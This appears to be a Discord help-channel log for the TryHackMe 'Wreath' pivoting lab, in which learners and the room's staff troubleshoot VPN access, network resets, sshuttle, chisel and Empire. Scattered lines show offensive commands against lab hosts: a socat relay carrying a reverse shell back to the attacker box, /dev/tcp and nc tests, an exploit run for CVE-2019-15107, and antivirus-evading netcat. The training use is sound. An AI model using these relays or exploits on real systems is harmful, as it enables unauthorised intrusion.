Now that is because you don't have gitserver.thm in your hosts file

so the Proxy was only onedirectional connection ? but then we uploaded the nc using the attacker ip

Try doing it with the IP instead @high totem

Which proxy?

Ok!!!

the Pivoting

Which proxy in the pivoting section?

the last one

the one recommended to use chisel

.150 @high totem

Ah, the last practical pivot. What do you mean one directional?

After four minute it downloaded. Thank you very much

As in, does sshuttle create a one directional proxy?

Awesome!

you said the ncat listener should be in the .150 machine , i say why not in the attacker machine

That's looking good!

Netcat should be listening on .200 if anywhere. Preferably it should be on the attacking machine with a relay

But still nothing happens here ....

Essentially because yes, sshuttle creates a one-directional proxy

Do you have a netcat listener running on .200 still?

That'll be a yes

Yes

Could you use firewall-cmd --zone public --list-all for me on .200?

Hold on, earthquake

Wait, literally?

Yes... just for a few moments... phew, it stopped

I’m in the land of earthquakes... japan

thanks ,

All right, I’ll list the ports .... but it won’t let me get out of the listener

Oh, just ctrl + C the listener for now

Ok, start the listener again, then try to connect to it from your Kali?

Just echo "Test" > /dev/tcp/10.200.106.200/16543

Or

echo "Test" | nc 10.200.106.200 16543 -w 1```

Something like that

Perfect, so it's a payload thing

Ok, restart the listener. Can you send me the curl command you used?

Like, the full thing

Okay, that looks good to me!

Where were you sending it from?

From my parrot terminal

So you are. Apologies -- forgot there was a screenshot

Now it looks like this...

Okay, you've got sshuttle running, yeah?

That would indicate either no, or the network went to sleep

Cool. Can you access 10.200.106.150 in your web browser?

Perfect. Ok, now what happens when you execute the curl command?

I get “”

Hello, I'm having issues to download my .ovpn file in order to connect to #wreath-network since 3 or 4 days I'm having this same problem https://ibb.co/QQjbn78 any idea to solve the issue?

And the nc listener still does nothing

There is a listener running at the same time, yeah?
If there is then it's a payload thing

Blugh. Then I'm missing something in that payload

-undelete -a

Oh oh oh

Not a clue -- I can't see the image :)
If you verify then you can send it directly

!docs verify

Ayeeeeeeee!

What was it?

But then nothing happens

Press enter in that shell

Where is the pc prompt

Or type whoami then press enter

It should appear

Ohhhhhh myyyyyy gooooooood

I want to cry
I’ve been stuck on this for 2 days

I’m so happy

Has that been the problem the entire time?

Yessssssss. Nice one!

YESSS!!!!!!!!!!

Hehe, learning experience there

Windows is weird

Oooohhhh myyyyyy gooooood
NOW I can go on

So so happy
Too bad you can’t see my huge smile

Thank you so much Muiri really

Np! 😄

Now I’m not moving an inch from this laptop

Set up persistence quick! 😁

yiks... i can't drag n drop the image here 😦

let me google that, sorry 😕

Yeah, just verify your THM account and you will be able to

!docs verify

minor typo: task 9, "outwith the scope" should be outside

@merry robin despite of the error I've downloaded a .ovpn by refreshing the page but have issue trying to connect to the network...

What's up? Muir's gone to bed

I did a less to that .ovpn file and the first of the lines say this: <!DOCTYPE html><html><head><title>TryHackMe | 404 - An error occured.</title><meta name="description" content="TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!" />

@dry pendant

lmao that example

lol

:v

It's part of Scots dialect 😛

I thought you lived in the UK, not scotland

Scotland is part of the UK (for now)

but okay, fair enough

trying to be a security professional but I have difficulties to upload an image to this discord chat 😂

ascii art and interpretive emojis ftw

hahaha

Again, you'll need to verify with the tryhackme bot

!docs verify

Follow the instructions in that link

Aaaww thank you! I can upload images now ❤️

👍

that's the error I have every time I want to download the .ovpn file (even now despite I'm a verified user)

Im getting rce but still no shell👀

@limber rover Can you take a look at this in the morning? Something seems broken

Verifying just gives you some more perms in the discord and links your site account to your discord account, doesn't fix anything.
Allows you to send images here.

( the .ovpn file in order to connect to #wreath-network )

nmap port scan is not working in the machine.

/tmp/nmap-thormm 10.200.10.100
[-] Failed to execute command

-sS -sN, etc..

sure, my bad, sorry

I've pinged skidy, you might need to just wait until he can take a look. It's 2:27am in the UK RN

i thought you folks weren't allowed to sleep

🙂

Really apreciated @strange bison thank you! 🙏

Muiri: +1 for the portal reference 😁

I have mimikatz installed here on parrot os
I’m running the power shell as administrator
The name of the share is share

Sorry for the long time.... the network kicked me out and I had to connect all over again (o^^o)

I copied the tsclient command from the task, since I can’t type the back slash on my laptop’s keyboard

(One of the reasons I don’t use Windows lol Linux only here)

I watched the walkthrough video for this before bothering here... but it didn’t say anything on this error... he named his share differently... I just kept “share”! Is this the problem?

YAY!!!! My stupid brain was finally able to solve a problem by its own!!!!!!

I thought about it, and realized mimikatz was not in the Windows-resources here on parrot OS... so I just moved it , and BOOM

Parrot OS users... mimikatz is not on windows-resources.... it is inside share, so you need to move it to windows-resources in the terminal
sudo mv... etc

That's good to know, and I'm glad you worked it out.

When you install mimikatz here on parrot, it goes inside /usr/share ... not inside usr/share/windows-resources
So the GUI task won’t work for parrot os users unless mimikatz is moved into windows-resources

If they are copying the commands from the task, it says a good directory to share is usr/share/Windows-resources but if mimikatz is not there it won’t work lol

I'm fairly sure the room is written assuming Kali or the AttackBox

I tested it on a fresh install of Kali.

Sorry 😞

Don't apologise, it just means sometomes you need to put in work that Kali uses wouldn't, like here.

I know I should use Kali instead of parrot, but all I have is a 10 year+old laptop which I recently put more ram so it has 8g of ram ... I do have Kali in a VM but the old laptop gets angry at me when I deploy it. I could’ve used the attack box, but for some reason the mouse cursor doesn’t work for me here, when I try to use TryHackMe attack box.

So all I have is my own distro to do this, I’m sorry 😞

I used a roughly 7-9 year old thinkpad to test it, with a Kali VM.

facing issue while forwarding port using chisel in Wreath room Task 33, I did follow the video but still cant access 10.200.N.100 web page

Hello everyone

I just have issues with Prod-serv. I restarted the network and webmin is unreachable

network 72

I was about to start over so that I could resume from task33 ,but privatekey changed on prod-serv and webmin server not available

someone please help me reset the network

@bright knoll you're in my dev network anyway, which accidentally had a hundred people shoved into it so you're never going to manage a reset. Leave the room and rejoin -- you'll get put into a network with a more manageable number of people.

@merry robin gooood to know 😄 thanks 😄

Goodmorning and Hello, Kudos to @merry robin for this amazing room

I need help with creating a socat proxy between the attacking box and the git-serv in the Task 20. ( I've tried using netcat directly on the prod-serv and I do get a reverse-shell, but I still want to try socat Port Forwarding - Quiet method mentioned in the Task 13).

kali box == sudo nc -lnvp 8008
kali box == ./socat tcp-l:8000,fork,reuseaddr tcp-l:8001 &
prod-serv == firewall-cmd --zone=public --add-port 16696/tcp
prod-serv == ./socat tcp:10.50.104.25:8001 tcp:10.200.103.150:16696,fork &

as soon as I send the powershell rev-shell to the git-serv, socat in the kalibox says that the port 8000 is already in use. 😭
Thanks!

@merry robin I just wanted to say thank you for wreath I haven't completed it Yet but I really like the pivoting part and I am writing a whole guide from the pivoting part I will soon publish it and ofcourse thank you !

Wreath Network Says running, but it's not responding. 5/8 resets requested. I'm connected to the network. nmap can't find any ports open on the webserver. Anyone else experiencing network issues?

show me what you doing i just started and everything is fine nmap is scanning fine

@shrewd bear I guess we both are on the same network 10.200.103.0, everything is find on my side. Is your sshuttle on? just check connecting to the server (prod-serv) via firefox.

10.50.103 is the network I'm connected too

where are you nmapping from? the prod-serv?

Oh

I wanted to continue from task 17, where I left it at yesterday. Connecting to the VPN I wanted to ssh back into to the westerner but could not, so I was just running nmap on the ports that should be open. Getting nothing back from nmap though.

Webserver

maybe regenerate your connection or try something maybe it'll work

Check your VPN, then open firefox and see if you can get to the webpage with the IP address or the hostname. (note : the OpenVPN console must print : Initialization Sequence Completed, for a success connection)

then ssh into the webserver and run your nmap scan from there, as mentioned in the Task 17.

Was thinking I might regenerate the vpn config again. VPN is saying 'Initialization Sequence Complete' Can't ssh that's the problem... not responding

damn

Oh...

did you try restarting your box? is your id_rsa correct? do you even get access to the webpage of the server? if noting works, wait for another response from here. Sorry m8

Regenerated the vpn but still the same issue. No access to the webpage. Like I said nmap is showing no response from the webserver, so I cannot even access the webpage. Thanks for trying to help 🙂

did you also check your local routes, maybe something got rekt there?

Tried connecting to the vpn on two different boxes and the result is the same.. not able to contact the webserver.

I'm experiencing >50% packet loss in network 10.200.87 through the last hour:

--- thomaswreath.thm ping statistics ---
2297 packets transmitted, 1096 received, 52.2856% packet loss, time 2326400ms
rtt min/avg/max/mdev = 0.770/1.298/7.394/0.466 ms

Connected through a browser-based Kali machine

All good again after the network state went back to stopped I was able to start it again and can now access the webserver and ssh to it again.

@merry robin i just finished the room . Thank you . I have only one question . On the desktop pc only the linked netcat evaded the AV all other netcat binary got deleted on execute

Nvm hahaha

i can't seem to cat in the stabalized shell

is anyone facing this

?

ok maybe i need to use the attackbox

actually no it seems like the private key is really empty

i can cat the public key

but not the private

oh ok seems like it's by design

the private key is not really needed for another level it seems

Wdym?

@shrewd bear @mighty elk if someone decides to troll and shut down the box then there isn't a lot we can do other than reset I'm afraid. If I catch anyone doing that they're getting banned though.

@merry robin Thanks

I can't access the network even with a freshly generated vpn config

Every netcat binary version expect the the one in the repo which you included in the description got deleted by the Windows defender . I did it with what you provided but it was weird . This happened on the desktop pc

Why do you think I linked that repo? 😁

Woke up wiht a fresh morning with the excitement of continuing Wreath network.
Connected openevpn

./CVE-2019-15107.py 10.200.72.200
[-] Failed to connect to http://10.200.72.200:10000/
Okay.. What's going on?
sudo nmap -sS -T4 -p 10000 10.200.72.200
10000/tcp closed snet-sensor-mgmt
What an adequate morning it is!

Can someone let me know that I am not the only one facing this issue?

@pale seal you're in my dev subnet for a start. Try leaving, rejoining, then redownloading the config pack

Am i the only one who cannot access the Wreath Network?
I already done all the exploitation, i had the SSH key but now is saying this
https://i.imgur.com/HiXtSQ4.png

I tried to exploit it again but it seems that the vulnerable service is shutdown

I re-downloaded the VPN and rejoined the room too, idk what to do

ThorMM did it work for ya?

It's sad because i really liked the room

@unborn wren Unfortunately, nope! Re-downloading (regenerated version) config pack hasn't solved my problem.

Ok now maybe it will work, but it doesn't even ping the machine

i'll wait a few minutes

yea, that's the plan for now.

idk y but when i redownloaded for the second time the configuration, the target and mine's IP changed

That's interesting.

@unborn wren look up just a little in the chat. 72 is the dev subnet which a bunch of people got shoehorned into by accident.

Leave the room, rejoin, redownload the pack.

kk now it works

the ip is now 10.200.118.x

Sounds like you already did, if the IPs changed

thanks

^^, Np

The room is really cool!

@pale seal if you fancy reading that message (or one of the two identical ones I sent in 5 minutes), it should sort it for you as well

thanks for the time you spent, i really appreciate it

Glad you're enjoying it! 😄

It's working for me now too.

Perfect 😄

nvm

?

Nothin i solved

i tought .200 .100 had different website

and couldn't figure it out why my pivoting wasn't working

👍 💯

Ahahah, faiiir

I have a problem trying to ssh to ||.200|| and also sshuttle is not working because of "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."
I looked up here if anyone had this problem before and found that on 3/25/21, a few had encountered this problem. The cause reason was mentioned that it had to do with someone messing with id_rsa.pub file. Am I facing the same case?

Huii i unlocked the networks room yesterday, i wanna know a few things.

1. wat is it exactly
2. do i lose it if i break my login streak
3. is it limited time

1. A collection of boxes on a network to learn pivoting and C2 etc
2. No, as long as you joined when you had the streak/subscription
3. Kind of. You get 10 days of access, after which you have to rejoin. This helps avoid having networks with inactive users.

Alright thankss! :D

Yeah. Disconnect and DM me your config file please 🙂

Hi guys, currently doing wreath network, after establishing persistence and took the id_rsa file, I'm trying to connect to the machine using ssh however I receive permission denied

Anyone experienced this and know why is happening?

added 600 permission to the id_rsa

and no space in the content

DM me the key please

Since 5 days ago I can't download the .ovpn file in order to access to #wreath-network someone had same experience? 😢

I pinged skidy

Thank you again @strange bison 😄

It's a matter of patience

okay ^^

allo, with wreath the final windows service has been gone for a few days

i skipped this part using printspoofer, so its just an fyi. a crash or something? i was having trouble exploiting it when it was there - maybe it died

How the hell is Printspoofer working on an up-to-date Windows server smh

Goddamnit Microsoft

lol

11 sep release, maybe they've mangled it or somthing

It's got a scheduled task propping it back up every 5 minutes, so I'm not sure what's happened there

maybe my username defeats av

its been down for at least a few days. want the ip?

Mind passing me your config pack?

sure

Ta 🙂

Are there a tool that i can use to make armitage diagram like the one on the top of the page in wreath room?

Not armitage, that's for sure

Not sure though. It's almost certainly a JS plugin

Okk

Great room BTW

If anyone had a shell on 10.200.96.100 and just lost it: apologies. Some selfish moron has decided it would be funny to uninstall the privesc. Needed to restart, and may need a reset

Thanks for the ping:) Dealing with this now

Hey sorry about that - can you please give me an IP of a machine on your network please?

Is Wreath streamable?

It is now, yes 🙂

sweet

Anyone have problem to access machine with ip 10.200.118.x

Destination Host Unreachable

I try regenerate config file but still can't access the machine

Thank you @limber rover i will DM r n 🙂

Access from ip 10.50.119.x

Check that the network is alive for me?

Looks like that may need a reset then

@sharp folio same issue in my network. Logged in to resume and could not ssh in with they key. Ping,nmap and unicorn have host unreachable or cannot connect to device at port 22

Which subnet are you in @drowsy pine?

10.200.98.0/24

98

Yes

@limber rover if you're around would you be able to check the status on 98 and 118? 🙂

Tried redownloading config files and what not as well.

Thanks for the support

Thx @merry robin for your response, waiting @limber rover check the network

Np, but please don't ping poor Skidy more than needed 🙂

Yes sir

I found this issue after machine stoped, and then i start again, status running but cannot access the machine

Same here.

PONG PONG PONG

Muiri- the pivoting writeups are incredibly well done, very educational. Thank you for the time and effort you put into them

as a noob, it's helped me a lot to understand what's going on

Let me take a look:)

Thanks! 🙂

.98 shows as running
.118 shows as a deleted network?

A... deleted... network?

#wreath-network message

This was from an hour ago

Opps sorry, a network was deleted with that range and a new one was created shortly after.

.118 is a stopped network, the user just needs to start it:)

Interesting. I wonder if it was hit by that front-end extend thing?

Not sure if that was sorted?

Its on my list:) I'll get on that this week

Ah, cool 😁

Yeah, I think that's hit a few times recently, from the sounds of it

Networks being stopped but showing as active

Getting that fixed will definitely reduce it a bit at least

Yeah with the number of networks, its going to happen more often - so that will be fixed this week:)

Awesome. Thanks Skidy!

No worries:) Thanks for letting me know about the other networks - also, just ping me with a list to check if others report problems:)

Will do 🙂

not directly related to wreath, but I had a lot of trouble stabilizing my reverse shell from the first machine in task 6. For my needs, and at the time, I didn't need it, so I moved on, but it's something I need to come back to at some point. Besides the 'what the shell' room, do you have any good resources for understanding the various methods there? Websites/books/etc.?

I made the What the Shell room based off of my own notebook, so, I'm not sure I do, unfortunately :(
I tend to just rewrite things into my notes, rather than taking direct references.

Others might though

If you're on zsh, the "magic" stabilisation needs a smol change

no problem, was just curious. I haven't done the shell room yet, so I'm sure it'll answer some of my questions, but that's an area I feel pretty weak in still

magic stabilization?

magic

🪄

$ stty raw -echo $ fg
needs to be
$ stty raw -echo; fg

https://tenor.com/view/magic-shia-labeouf-snl-skit-fingers-gif-4860090

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Like it's called magic here

😂

yeah, so that's actually one of the methods I tried, James. But instead of stabilizing it, the text got moved over to the right, and I didn't have an actual stable shell- no autocomplete, no arrow navigation, etc

the prompt/text was corrupted

did you try reset?

at one point, my terminal window even froze, and I had to kill the process. I tried a few different things and none worked

oof

yeah, tried a reset

although if memory serves (and I may be wrong here, it was late, I was tired, and I tried a few different things), the times I tried reset were in a "corrupted" shell

so that command probably wasn't being executed at all

Yeah, so that'll probably be the ZSH bit messing you up

but you say that doing the single line
stty raw -echo; fg
if the correct way? Because I'm certain I tried that

for the bonus question in task 13- I have the .pem file on my attacker machine. Since at this point, I don't have anything beyond the first machine enumerated, how can I test that I've done the bonus question correctly?

im stuck on wreath last 2 question on task 38 can i pm someone ?

You can either forward something from that machine, or try it between local machines

Just ask here -- it may help others who are stuck in the same place 🙂

Not sure I fully understand

but I'm thinking maybe it'll be easier to test once I have a third machine to forward to?

That would be the other option

In terms of a local port forward, you could do something like forward the website on the compromised machine to a local port on your own machine

The fact that it's accessible without it doesn't stop you from testing it

hm, okay

is the syntax for the chisel remote port forward correct? THe instructions state port 2222 but the example command uses 1337

or is that actually opening two ports on the attacker machine?

an example command is exactly that an example

sorry for the stupid question- still trying to understand it. Am I correct in thinking that two ports get opened on the attacker machine? the 1337 server, and the 2222 that gets forwarded to the compromised machine, and then on to port 22 of the target?

alright who closed ssh?

Pretty sure I'm not on that network, but it's certainly possible I broke something with my recent forwarding practice

what subnet is your connection on?

mine is 10.50.92.0/24

if you are on that one it's broken

10.200.115.200 is the only IP i've been working with so far

ok

mmmm

well no ports are open weird

@dry pendant I don't think it's you I think the network is being overloaded or something

@dry pendant did you get your pivots to work?

yeah, I'm fairly certain we're on different subnets, but I've been playing around with chisel the last hour, and did just kill some processes on the first machine

as for pivots, no not yet. I haven't enumerated into the network yet, still trying to wrap my head around the pivoting instructions

I'm on task 14

nevermind just got it 😄 thanks anyway

@dry pendant do you need any pivoting help?

Thanks. Not at the moment. I might tomorrow, but I'm about to call it a night. I actually just did the nmap scan on the first machine. I think once I play around with the instructions in the previous tasks and have an actual target to forward to, it'll start to make more sense for me

Does anyone happen to know if the python -m http.server also supports file uploads? Trying to send my scans from the compromised machine back to my attacker machine. From my searches so far (and failed curl -F), seems like the answer is no

python only serves files. you @dry pendant you have to transfer with wget, curl, or other from the victim machine as a request to your python webserver. Unless there is something I dont know

but since you have ssh sftp or scp can be used to move files.

yeah, I have the python web server running on my attacker machine, was trying to curl from the compromised/scanned machine to my attacker box, but get 500s back, which isn't a big surprise

but yeah, I can ssh and do something else, just wasn't sure of the best/easiest way to do it offhand.

are you using the public ip in the curl request?

wait nvm

that would be no connection

What do I do if I don't see anything in the network panel

i used my tun0 vpn ip

Trix- maybe tryr refreshing the page and seeing if the server is stopped, then hit start?

Even after a refresh, the panel is still blank. And yes, it's running

@dry pendant did you change the port served

no, it's on port 80 (python3 -m http.server 80)

it default to port 8000 but you put it on 80 which shouldn't be a problem

yeah, I think it just doesn't allow posts

curl -o not working right?

What do I do

Help

hi

help with?

.

What network panel?

.

The big black thing at the top of the page

It's blank but according to the task there should be an IP there

I did a:
curl -F 'data=myfile.gnmap' 10....<my vpn ip>, but get a 501 back

501 Not Implemented?

"The request method is not supported by the server and cannot be handled"

@dry pendant you might not need the -F curl http://lhost/filename -o output-filename

And that's for uploading to http://lhost ?

lhost is your attack box tun0 ip

curl on the first machine to your python3 server

right

my network just expired, but I'll try that tomorrow

@round tree it took me a few times to get that to show after question where answered not sure if that's the problem

@dry pendant maybe the python web doesn't support curl -F you could try starting a Apache webserver and downloading the file from that

or PHP webserver or other

trying to upload though, not down (upload from internal/compromised machine to my local attacker machine)

I can download from attacker machine to compromised machine, but I think to go the other direction I need to start some other service on one or the other machine, or maybe some other approach

file attack -> victim machine right?

I've refreshed multiple times and still nothing

oh victim-> attcker

not f5 like a question that hasn't been answered but dont remember

right. I performed the scan on the victim machine, trying to get that scan output file back to my own machine. Easy workaround is to just cat the file in the remote shell and paste it on my local box

was smashing through it and realize I could see the network

@dry pendant you can sftp. it is like ftp but over ssh

s c p

sftp -i keyfile user@ip

get filename

but I'd need to start an sftp service first, right?

scp works but you need to remember the full path

no sftp is a command like ssh

oh

man sftp

Should I spam my function keys

I thought it would only work against a running service

nope

I mean you could but dont have to

I need the webserver ip

Does anyone have it

I can't see anything in the box

the first machine?

y e s

10.200.92.200

pls

Thanks

depends on which network you are assigned to

the first machine in my network is 10.200.115.200

@dry pendant hope that works and oh really?

I'll try your IP because the first try rejected my ping

host down

wtf man

yeah, there are many instances of the network running. People get assigned based on which ones are full.

WAIT

I CAN SEE IT ON MY PHONE BUT NOT MY PC

10.200.119.200

Sounds like extensions

do you have some extension on your pc browser that could be blocking it? flashblock or something?

Won't be flash but yeah

Nope

My browser is managed by my organisation since I'm on a school laptop so could have something to do with that

Hi, impossible to work with 10.200.106.200 20''/30'' second delay in each keystroke.

Network state :Resetting 👍

I have 7 days streak but not able to access to it

Hi, You have connected to the vpn wreath first, right?

Then, run a basic nmap, and try to connect to a port even if you don't have credentials yet.

When I join room it says I need 7 days streak but I have

This is problem

An administrator will be able to answer you, sorry.

It is rare. The tunnel works correctly but the network to 10.200.106.200 fails.

64 bytes from 10.200.106.200: icmp_seq=437 ttl=63 time=26.8 ms next 64 bytes from 10.200.106.200: icmp_seq=561 ttl=63 time=26.2 ms 124 packets lost , for every 120 packets sent (icmp), there is a connection loss, which lasts 124 packets (icmp)

Have a look into "updog"

I was in that network!!! I surprisingly was able to finish it yesterday evening!! Everything was very slow (the evilwinrm download that in the task says that it will be only a minute or two....took 45 minutes for me 🤣)... I did notice also a delay in each keystroke and all responses were really delayed... I was blaming it on the crappy Japanese internet (contrary to popular belief this is not a high tech country and internet connection is REALLY slow) ... but I’m surprised I’m not the only one! I wonder how many people are/were in the 106 network!!

@merry robin I was able to finish the Wreath network!!!!!! ٩(๑❛ᴗ❛๑)۶
I want to say thank you so much for everything and your patience guiding me the times I was stuck!!! Couldn’t have done it without you!!
Thank you thank you thank you!!

Even though I’m finished, am I able to still connect to it through the 106 network that was assigned to me using the VPN?

This is such a wonderful learning opportunity, I do want to do it all over again, for practice.
I did write lots of notes and commands I used etc, and I feel that doing it again, this time with much better understanding will be really valuable to me.

Would it bother other users who haven’t completed it yet if I work on it again?

Well done @high totem!
Yep, you are still able to connect to it and do it again. It won't bother other users -- it would either be you or someone else doing it 🤷‍♂️
Not sure what your timeout is in terms of the 10 day thing, but if you get removed you can just rejoin :)

I don’t think I’m aware of a 10 day timeout??
But I’m thrilled that I can redo it to practice everything I learned, and I really want to thank you for making this wonderful network for us. Really appreciate it!! 😊

the RCE_exploit_for_version_2.3.10 code is not working

in python2

i did pip install requests but still not working

even in python3

There's a 10 day limit on the room to prevent people from taking up space in a network if they aren't actually using it. If you look at the top left of the screen under the banner it should show you how long you have left @high totem
If that expires then you can just rejoin though 🙂

No problem with people rejoining as long as they are actually doing something with it

@lilac jasper python2 -m pip install requests
If that fails, search for the PyPy get-pip.py script online, run it with python2, then use the command again.

i did

If that fails, just use the python3 conversation I have pinned in here.

okay thank you

Thank you so much! I just connected through the VPN and it let me in (๑･̑◡･̑๑)

Perfect 😁

sir do i have to do chmod +x 43....py ??

because it's still not working

it get freeze at Get user list

Error: An error of type Errno::ENOENT happened, message is No such file or directory @ rb_sysopen - /opt/Empire/data/module_source/situational_awareness/network/Invoke-Portscan.ps1-Hosts10.200.112.100-TopPorts50

Error: Exiting with code 1

im getting this error when im trying to use empire portscanner

What command are you trying to use?

Invoke-Portscan.ps1 -Hosts 10.200.112.100 -TopPorts 50

if i use it without ".ps1" its doesnt recognize it

You need to import it first

. .\Invoke-Portscan.ps1

Oh, might not need the .\

Can't remember

thank you

Oh, doesn't even need the .

Just Invoke-Portscan.ps1 then run the command without the .ps1

?

Anyone having issues to download the ovpn for the network ?

anyone get this error when connecting

ya I also have an error when dowloading the ovpn configuration file

i can download the file. But when i try to connect i get that 😄

it's because it's a html file that you are passing to ovpn as argument, it's indicating a 404 error

yep you're right...hmmm i guess i cant download it lol

the same thing happened to me 😅

@merry robin can you see if there is an issue creating vpn files

Nope. That's technically an Ashu thing

https://tenor.com/view/breaking-computer-smashing-computer-gif-11992135

Hey, i cant view thomaswreath.thm (.200) in my browser (firefox), i have added it to my hosts file, tried manually adding thomaswreath.thm to exceptions by deleting the certificate in my browser and adding again (which BTW i couldn't add it back), thought maybe firefox was ignoring /etc/hosts so i read online and disabled "network.dns.offline-localhost" in firefox (since curl can reach it with --insecure) but no luck, any suggestions ?

oh and i have finished Wreath im just making a video on it, everything was working fine before today

Visiting "http://thomaswreath.thm" retruns:

    Name Error: The domain name does not exist.

10.200.88.200 - Destination Host Unreachable

You're saying that curl can reach it but firefox can't?

Is the network active?

Yeah, firefox was being weird idk why, changed my subnet tho everything works fine now

Strange

Glad you've got it fixed 👍

hey! Just finished writing the report for the Wreath network!

Who is Thomas? 🤣

Thomas is a software engineer ig

A fictional character I made up for the network

lmaoo

cause they said, Submit the pdf to thomas 🤣

anyways, can I dm you the pdf?

That was the "in-story" explanation

got it

The actual instructions are just below it

yep! Upload it to G-drive and send the link

right?

Upload it somewhere viewable then submit the link as a writeup in the room

okay

Got it!

Look forward to reading it 😄

btw

Is the $100 for top 3 reports still on

It is

And the best five will be linked to in the room

Cool

Done!

I have submitted the report !

Thanks a lot Muiri!

now its working fine :) thx.

I wanted to try wreath today, but I am having problems connecting.

What I did was, downloading the config file and using it with openvpn.
The page is telling me that I am connected but I cannot ping the host and nmap says it's down.
I tried regenerating the config file but that didn't help either.

Hey can I get a reset for 10.200.112.x

the destination host is unreachable

Im in the same subnet i cant reach .200

Make sure you download the network VPN configuration and not the normal one

glads its not just me ive been pinging it for ages

Yeah this step I did right 😂

Don't know what's wrong though, I will try working with the attack box

That was also not working. Gonna restart everything now.

@obtuse chasm Are you doing a forward proxy with chisel ?

@ember solstice yes

you connect to it from your attacker box with no problems ?

Yes

to the server which should be on .150

Ya

are you trying curl or in browser ?

Both but curl stays unresponsive and browser throws empty response

did you setup foxy proxy ( or an equivalent) on your browser?

did you run curl through proxychains ?

Ya

with proxychains.conf modified that is

I used foxyproxy

Yes

so whats the problem here ? the page is not loading ?

Yes

try proxychains curl 10.200.x.100 what do you get back ?

Ok

no need for (--insecure)

Ok

And btw did you add the firewall rule just incase ?

Thanks bro @ember solstice i forgot to remove tor xonfig

*config

Its worken😄

Great!

Hmmm @ember solstice bro it works on curl but not on browser even after proxy

Is there any thing i should add

Yeah, Foxyproxy, could you send ss of your foxyproxy options ?

run it through the port you specified in your chisel commadn/proxychains.conf

because curl works, there shouldn't be a problem with your proxy

I have used 9000 on my local machine

proxy type is incorrect

socks5

not HTTP

😂 dumb me thanks bro sorry if i have been disturbing you

Glad i could help, have fun with the network

Hello 👋 Uhm in the task 29, the agent in the git-serv dies/goes Stale everytime, is it normal? 🤔
Thanks!!

Btw Empire is just so damn awesome ...sure when it works lol

@mighty elk the empire tasks have been causing issues for me and other ppl, i think they are trying to get it fixed

@pallid vapor Ohhh..... so sad tbh it’s one of the most interesting breathtaking tasks in the room

Guys can you fix the .112 subnet

What's wrong with it?

Its working know bat not for the last 2 hours

Yeah, there's a little bug with the http_hop listener that's been fixed, but doesn't seem to have made its way into the main repo just yet 🙂

How odd

It’s been fixed on... github? I will try redownloading Empire and test it with the CLI mode

Btw, if anyone get a segmentation fault error when trying to use Empire on headless mode, update kali with full-update. I had issues and previously and the full-update fixed it. 👍

Thanks for the recommendation! Obligatory: what's 'updog' ?

i beliiiiieve its a closed fork so uh

yeah gotta wait sorry D:

I am not falling for that again

again?

... Don't ask

lol, fair enough

is there a good/reliable way of seeing what ports are open on the current machine?

Like, from inside the machine?

right

ss -tulpn for Linux

Would be netstat but netstat is deprecated. netstat -tulpn if netstat is installed. Gives a bit more of a readable output

thank you. That'll help me make more sense of the pivoting stuff

it seems like that's not entirely accurate- I currently have both an ssh connection and an sftp connection to another machine, but only a single item is listed- a upd port (45848)

Are you asking for "what ports are open" or "active connections"?

because they're different

both. Although I suppose my original question was intended to be more of the latter- active conn's

Ok, I'd recommend a quick google search then

thanks

yeah, sorry for asking a stupid question. 'man netstat' has the answers 🤦‍♂️

in task 17, for the tcp ports in ascending order question- I have more ports than I should. Easy enough to figure out the right order for the answer, just mentioning it in case that indicates something might be off with that network

Chances are some twit decided to ignore the advice and stick chisel on a port below 15000

139, 445, 5357 are extras on mine, but you mention the last one

Someone turned off the firewall...

Rip my .bak files got corrupted, think someone process killed my netcat before they downloaded

was sooo close

imma switch networks

so I should ignore 139 and 445? pretend those ports aren't open?

anyone having issues with connecting with sshuttle

mine isn't working, i used -r nothing but -e works still nothing

I haven't gotten that far, sorry

anyone?

Unable to reach 10.200.81.200 ....

Thank you so much @strange bison and @limber rover now I can connect to #wreath-network, really appreciated buddies! ❤️

have you tried to close your network connection, regenerate the .ovpn file, download it and try to connect again?
I tried that early and it worked

I disconnected an try to connect again

Remember the wreath ovpn is different to your regular one

Thank you soooo much @merry robin for such amazing and superb room!!! 💯 💯 💯 💯 💯

Yes i use another .ovpn file for this one

I sill recreate the file and download again

I tell you...

actually I had to do that twice idk but at the second time worked

the first one nop

i try again....

No

Not working

any issue while doing: sudo openvpn yamitar-wreath.ovpn ? o_O

nop

uhh...

I reach my first hope only

But routing not working

.1

and there stops i think

Some days ago I had the same issue

I they reset something

do not worry tomorrow I will review it again

sorry mate, I had some issues early while trying to reach the network but after recreating the .ovpn network file and trying connecting again twice it worked 🤷‍♂️

I wanted to check some commands I have problems with related to chisel but.........

Do not worry

good luck for tomorrow then, all the best with other rooms 🙂

Thanks for your time helping

anytime buddy! ^^

🙂

can anyone help with the sshuttle?

What is confusing you about it?

I was able to get a sshuttle connection between .200 and .150 pretty easily, following the instructions in Muiri's awesome writeups ( ❤️ Muiri). Enough to at least get me to the web page on .150

although now sshuttle refuses to die no matter what kill statement I throw at it 🤔

seemed the 'jobs' command was retaining a link to it and keeping it alive

how long should the ||gitstack|| exploit take to run? Mine seems to be hanging while retrieving the user list

but manually GETing that url comes back immediately

hm. 100% packet loss when I ping the .150 server, but I can do get's in a web browser just fine. No proxies configured, just sshuttle

not confused just that i used the -r switch and i got nothing

Windows firewall blocks ICMP echo by default, so that's normal.

The exploit not working, not so much -- that should be instant

yeah, that's what I thought. But it's timing out when trying to make a request (the exploit)

How many are you from a network reset?

Because it sounds like one may be beneficial

@merry robin please can i share the command i'm using with shhuttle with you ?

4/6

I would try to push for that reset if I were you. I'm 3/4 asleep so I can't really patch it manually I'm afraid

What's up?

no worries

will Pm with your permission?

Why not put it here? Might help other people with the same problem if it's in the public chat :)

I can share the command I used

alright will do

sshuttle -r root@10.220.xxx.xxx --ssh-cmd "ssh -i id_rsa" 10.200.xxx.x/24 -x 10.220.xxx.xxx
i did this and i got no connection all i got is an error?

10.220 won't be helping

10.200.xxx.200

where?

Both places where you've put 10.220

root@

Also with the exclusion

you lost me

There are no IP addresses on 10.220.xxx.xxx

It should be 10.200.xxx.xxx

Specifically 10.200.xxx.200

yeah that's what i'm using lemme just send it over via a PM so you can see don't wanna send it in here 😆

Go for it then

but i got no connections lol

hm. I can curl /rest/user and get the user list back, but the python exploit just wants to hang. I can't think of an explanation for that

Odd

Thanks @merry robin Bless you

